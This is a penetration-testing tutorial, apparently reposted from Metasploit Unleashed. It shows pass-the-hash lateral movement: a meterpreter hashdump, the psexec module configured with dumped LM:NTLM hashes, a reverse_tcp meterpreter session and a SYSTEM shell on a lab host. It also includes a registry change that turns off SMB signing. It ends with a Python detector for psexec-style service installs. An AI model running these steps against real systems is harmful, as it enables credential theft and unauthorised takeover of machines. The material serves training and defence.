Metasploit PSExec Pass The Hash

Original: http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
psexec is used by penetration testers to gain access to a system whose password is already known. As penetration testers, once we have gained access to a system through an exploit, we use meterpreter to obtain passwords, or dump the hashes with fgdump, pwdump or cachedump and crack them with rainbow tables.
We can also pass the hash with a tool such as iam.exe. The psexec module in metasploit lets you enter either a password or a hash value and gain access without having to crack anything. Once we have taken an administrator's password hash from one system, we do not need to crack it: psexec lets us use the hash to access the same administrator account on other machines in the same domain, so we can move between systems without worrying about cracking the password. [b][color=blue]One thing to note: if only the NTLM hash is present (for example the password is 15 characters long, or a GPO explicitly restricts them to answering with NTLM only), simply replace ****NOPASSWORD**** with 32 zeros, e.g.:[/color][/b]
[color=red]******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c[/color]
replace with:
[color=red]00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c[/color]
In the lab, the following may be encountered even when the correct credentials are used:
[color=red]STATUS_ACCESS_DENIED (Command=117 WordCount=0)[/color]
This can be fixed by setting the [color=blue][b]RequireSecuritySignature[/b][/color] value under [color=blue][b]HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters[/b][/color] on the target machine to [color=blue][b]0[/b][/color] (this value controls whether the server requires SMB signing).

[*] Meterpreter session 1 opened (192.168.57.139:443 -> 192.168.57.131:1042)

[b][color=blue]meterpreter > run post/windows/gather/hashdump[/color][/b]

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

[color=red]Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::[/color]
meterpreter >

Now that we have a meterpreter console and the dumped hashes, let's use psexec with the dumped hash to connect to another machine.
[color=blue][b]root@kali:~# msfconsole[/b][/color]



=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated yesterday (2012.01.14)

[color=blue][b]msf > search psexec[/b][/color]

Exploits
========

   Name                     Description
   ----                     -----------
   windows/smb/psexec       Microsoft Windows Authenticated User Code Execution
   windows/smb/smb_relay    Microsoft Windows SMB Relay Code Execution

[b][color=blue]msf > use exploit/windows/smb/psexec[/color][/b]
[color=blue][b]msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp[/b][/color]
payload => windows/meterpreter/reverse_tcp
[b][color=blue]msf exploit(psexec) > set LHOST 192.168.57.133[/color][/b]
LHOST => 192.168.57.133
[b][color=blue]msf exploit(psexec) > set LPORT 443[/color][/b]
LPORT => 443
[b][color=blue]msf exploit(psexec) > set RHOST 192.168.57.131[/color][/b]
RHOST => 192.168.57.131
[color=blue][b]msf exploit(psexec) > show options[/b][/color]

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.57.131   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPass                   no        The password for the specified username
   SMBUser  Administrator    yes       The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.57.133   yes       The local address
   LPORT     443              yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


[color=blue][b]msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c[/b][/color]
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
[color=blue][b]msf exploit(psexec) > exploit[/b][/color]

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \KoVCxCjx.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \KoVCxCjx.exe...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045)

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

[color=red]C:\WINDOWS\system32>[/color]
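The service-creation sequence in the output above (a random 8-letter service name, a random 8-letter .exe written into the Windows root through ADMIN$, started and then removed) is also what a defender can look for in the System event log. This added example is not part of the original post or of Metasploit; it runs a simple detection over constructed sample event lines, and the flattened field names (EventID, ServiceName, ImagePath, Account) are an assumption made for the example.

```python
import re

# Constructed sample records (not from the original page): Windows System log
# "service installed" events (ID 7045) flattened to one key=value line each.
# The first two imitate the psexec run above: a random 8-letter service name
# and a random 8-letter .exe dropped into the Windows root via ADMIN$.
# The third is a legitimate service; the fourth is a different event type.
SAMPLE_EVENTS = [
    "EventID=7045 ServiceName=XKqtKinn ImagePath=%SystemRoot%\\KoVCxCjx.exe Account=LocalSystem",
    "EventID=7045 ServiceName=MSSeYtOQydnRPWl ImagePath=\\\\192.168.57.131\\ADMIN$\\KoVCxCjx.exe Account=LocalSystem",
    "EventID=7045 ServiceName=wuauserv ImagePath=%SystemRoot%\\system32\\svchost.exe -k netsvcs Account=LocalSystem",
    "EventID=7036 ServiceName=XKqtKinn State=running",
]

KV_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")      # key=value pairs; values may contain spaces
RANDOM_EXE_RE = re.compile(r"^[A-Za-z]{8}\.exe$")   # exactly 8 letters + .exe
RANDOM_NAME_RE = re.compile(r"^[A-Za-z]{8,16}$")     # letters only, 8 to 16 long
WINDOWS_ROOT_RE = re.compile(                        # Windows root, local or via ADMIN$
    r"^(%SystemRoot%|[A-Za-z]:\\WINDOWS|\\\\[^\\]+\\ADMIN\$)$", re.IGNORECASE
)

def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(KV_RE.findall(line))

def split_image(event):
    """(directory, binary) of the service executable, arguments stripped."""
    path = event.get("ImagePath", "").split(" ")[0]
    directory, _, binary = path.rpartition("\\")
    return directory, binary

def is_psexec_like(event):
    """True for a 7045 record whose binary is a random-letter .exe directly in the
    Windows root and whose service name is random-looking mixed-case letters."""
    if event.get("EventID") != "7045":
        return False
    directory, binary = split_image(event)
    if not (RANDOM_EXE_RE.match(binary) and WINDOWS_ROOT_RE.match(directory)):
        return False
    name = event.get("ServiceName", "")
    mixed_case = name != name.lower() and name != name.upper()
    return bool(RANDOM_NAME_RE.match(name)) and mixed_case

def find_psexec_services(lines):
    """Return (service name, binary) for every suspicious record in the input."""
    hits = []
    for event in map(parse_event, lines):
        if is_psexec_like(event):
            hits.append((event["ServiceName"], split_image(event)[1]))
    return hits

if __name__ == "__main__":
    for name, binary in find_psexec_services(SAMPLE_EVENTS):
        print(f"suspicious service install: {name} -> {binary}")
```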